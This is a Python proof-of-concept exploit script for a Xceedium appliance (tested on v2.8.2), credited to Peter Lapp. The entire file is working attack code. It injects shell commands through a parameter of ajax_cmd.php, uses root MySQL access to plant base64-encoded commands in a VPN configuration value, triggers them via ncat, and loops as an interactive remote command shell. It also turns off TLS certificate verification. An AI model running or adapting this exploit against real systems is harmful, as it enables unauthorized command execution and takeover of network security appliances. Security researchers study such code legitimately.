# Tested on: v2.8.2

import urllib2
import urllib
import ssl
import sys
import json
import base64


ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE


def send_command(ip, cmd):
cmd = urllib.quote_plus(cmd)
url = 'https://'+ip+'/ajax_cmd.php?cmd=AD_IMPORT&command=add&groupId=123&importID=|'+cmd+'+2>%261||&deviceMode=test'
request = urllib2.Request(url, None)
response = urllib2.urlopen(request, context=ctx)
result = json.load(response)
return result['responseData']

def get_db_value():
cmd = "echo select value from configuration_f where name = 'ssl_vpn_network' | mysql -u root uag"
db_value = send_command(ip,cmd)
db_value = db_value.split('n')[1]
return db_value

def encode_payload(cmd):
sql_string = "update configuration_f set value='\';"+cmd+" > /tmp/output;\'' where name='ssl_vpn_network'"
cmd = "echo "+base64.b64encode(sql_string)+" | base64 -d | mysql -u root uag "
return cmd

def restore_sql(value):
sql_string = "update configuration_f set value='"+value+"' where name='ssl_vpn_network'"
cmd = "echo "+base64.b64encode(sql_string)+" | base64 -d | mysql -u root uag "
send_command(ip,cmd)

def main():
print '''Xceedium Command Execution PoC by Peter Lapp(lappsec)'''

if len(sys.argv) != 2:
print "Usage: xceedium_rce.py "
sys.exit()

global ip
ip = sys.argv[1]
print 'Enter commands below. Type exit to quit'

while True:
cmd = raw_input('# ')
if cmd == "exit":
sys.exit()
orig_value = get_db_value()
payload = encode_payload(cmd)
send_command(ip, payload)
send_command(ip, 'echo -e openvpn\n | ncat --send-only 127.0.0.1 2210')
output = send_command(ip, 'cat /tmp/output')
print output
restore_sql(orig_value)



if __name__ == "__main__":
main()

Source